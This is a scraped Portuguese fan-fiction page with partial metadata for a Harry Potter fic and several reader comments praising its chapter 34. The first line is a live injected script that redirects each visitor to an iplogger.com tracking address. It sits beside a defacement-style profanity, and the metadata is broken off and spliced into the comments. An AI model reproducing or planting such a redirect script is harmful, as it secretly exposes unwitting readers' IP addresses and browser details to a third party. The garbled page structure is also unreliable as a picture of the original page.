<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Magnifico...... sem duvida nenhuma essa é a melhor fic que eu ja li.... to muito, muito, muito curioso pra ver o que vai acontecer..... por favor não nos deixa esperando + de um mes para ver o final, se bem que se tiver que esperar um mes pra ler outro capitulo perfeito como esse eu espero !!! bjus....
2006-06-02puts! divino esse cp34! magnificamente d+ totalmente loco! to ancioso pelo último cap!
2006-06-02puts! cn entendi errado o harry absorveu os poderes do voldi+ o dele msm e ficou d+
2006-06-02minha mente viajou nas senas ainda+ na sena final da morte do voldi vc é d+
2006-06-02vc tinha me dito que era o ultimo, mais tudo bem. Exepcional o cap to esperando pelo último. beijos.
2006-06-02ei, tipo assim: vc vai fazer uma continuação? ou algo assim?! diz aí vai! ;) :)
2006-06-02(...) um minuto de silêncio, em agradecimento à todos os deuses e santos.... Yes, o Voldie se foiiiiiiiiiii!!!!!!!!!! uh-huuuuuuu!!!!!!!! Eu sei que é um pensamento maligno querer a morte de alguém, mas apesar de eu gostar bastante de vilões, eles matam os meus personagens favoritos (sirius, Dumbie, Eriu - ok, nesse caso a culpa foi minha...huahauhau). Ai, tô trêmula até agora...tive que ler o cap. duas vezes pra poder raciocinar com clareza. Estupendo!!!!!!! Vamos por partes: 1- Aquele diálogo do início do capítulo ficou bárbaro "Dois generais avaliando o inimigo e preparando suas estratégias." Como vc mesma escreveu. A fina ironia do Voldie, a calma do Harry (se fosse eu, já teria me borrado de medo) ficou mto bem colocado. Adorei a postura 'semelhante' ao Dumbie, que o Harry assumiu. Nossa, me arrepio só de imaginar...2- Nem tinha me tocado pro que a Nagini tinha percebido. Achei que a cobra tava ficando doidinha...hihihi...Ai, eu lembrei do cap. anterior, onde o harry pedia um favor misterioso pros amigos. Muito bem sacado. Talvez o Harry ñ conseguisse se safar sem ter a presença dos dois ali. 3-Quando o Harry começou a jogar os objetos que serviram de horcrux, me deu uma angustia...fiquei imaginando o desespero e a fúria do Tom (nhá, agora é Tom, nada de Voldemort) 4-"Rony, livrando-se da capa de invisibilidade, acabou de decepar a cabeça partida de Nagini e atirou-a aos pés de Voldemort, que olhou chocado para baixo, ao mesmo tempo em que Ron atirava a espada para o amigo. - HARRY, ELE ESTÁ MORTAL!" - Eu tive que enfiar a mão na boca pra não gritar...yes, viva o Ron, o ruivo mais lindo e fofo que existe. 5- ai, a ingenua da morgana achou que isso seria o suficiente pra deixar o Tom mais fraco. que belo engano! o largatão (como titio druida o chama) ficou mais enraivescido ainda. Fez mágica sem varinha O.O...ui! 6-"- E nem é tão difícil assim engana-lo... Eu consegui no cemitério... Snape conseguiu inúmeras vezes... Até o idiota do Malfoy escondeu fatos de você... Sem contar Rabicho..." isso foi pra provocar o Voldie, né? 7- Aqueles pensamentos do Harry ficaram mto 'perturbadores'. Como eu disse antes, me lembrou qdo o harry ouvia a voz do basilisco, cara, me deu MUITO medo...(acho que vou dormir com a minha mãe hj) 8-"Poderoso?... Não vi tanto poder assim...Vi um sujeito rejeitado pelo pai... Que tinha que comprar a companhia dos colegas e asseclas, cercando-se de interesseiros e imbecis !... Cuja mãe preferiu morrer a conviver com a própria cria...Até sua concepção aconteceu de uma enganação, Tom..." uhhh, agora o harry pegou pesado...mexeu com a memória da mãe dele. O.O 9- Vc realmente não tem pena das suas pobres amigas, né? Aquela cena da conexão mental dos dois me deixou apavorada, toda aquela maldade, as atrocidades feitas pelo Tom, toda aquele prazer sórdido em ferir, matar, destruir. Só isso já seria o suficiente para acabar comigo. ai, temo pelo Harry. 10- (...) *morgana respirando fundo várias vezes*. O que diabos foi aquela cena em que o Harry se ergue? caramba... uau...sem palavras... um harry maligno é bem mais assustador do que um voldie de posse de todos os seus horcruxes...*medo**medo**medo**medo**medo**medo**medo* 11- O duelo dois dois ficou simplesmente maravilhoso. Nossa, não consegui articular nada nesse sentido. 12- Agora o ponto alto de toda a fic, de todo esse capítulo foi o momento em que o Harry cortou a cabeça do Voldie. Essa cena ficou digna de Anne Rice (das crônicas vampirescas). meumerlindocéu!!!!!!!!!!!! Ai, teve todo aquele lance do corpo se desintegrar e tal...uau!!!!!! 13-"Gina livrou-se do braço do irmão, ignorando sua advertência para que ficasse onde estava, e andou de gatinhas, arrastando a perna machucada, até achegar-se a Harry. Devagar, colocou a mão sobre o braço direito do rapaz, cheia de emoção e vontade de abraçá-lo pelo resto do ano para comemorar o fato de estarem vivos, orgulhosa pelo extraordinário bruxo que ele era, e chamou baixinho. - Harry?... Acabou..."- E mais uma vez eu achei que tivesse td bem, e que o harry ia olhar pra Gina e os seus olhinhos iriam estar verdes e límpidos, irradiando medo e alívio, mas o que aconteceu depois disso? O Harry ficou estranho...ahhhhhhhhhh *se desespera*. E agora? pra onde ele foi? (a sua dica não me ajudou mto, não..rs) O que vai acontecer? Enfim, acho que deu pra comentar td...Foi sem dúvida o melhor cap. da fic. Nossa, me deixou com medo, sério! Mal posso esperar pelo próximo, se bem que isso significa terminar a fic e eu não estou preparada pra me separar dessa história. Sublime, Sônia, Sublime. Que os bons deuses conservem o teu talento. Grande beijo e parabéns. É uma honra ser amiga sua...;-)
2006-06-02INCRÍVEL... Só uma queixa: não me mate de ansiedade poste rápido o próximo, estou louca para saber o q vai acontecer no final. Adoro quando vc escreve romance espero q tenha muuuuuiiiiiiito no próximo capítulo. Realmente esta é a melhor fic q já li até o momento. Beijocas
2006-06-02Oi! Queria só dizer que voce escreve bem D+! Amei o capitulo 34. Tão intenso. Tão fiel a historia original! Vê se nao demora atualizar, viu??? Beijos! ;D
2006-06-02Adorei o capitulo, valeu a pena esperar, como sempre... Mas Sônia, o q aconteceu c Harry??? Por favor não demora mto a postar o ultimo capitulo, vc já tem algumas coisas prontas né???? Espero q sim!!!!! Amei a maneira como Voldemort morreu, ahhhh amei td na verdade, a sua fic é melhor de todas q eu já li, to curiosaaaaaaaaaaa p saber o final!!!!!!! Bjos!!!
2006-06-02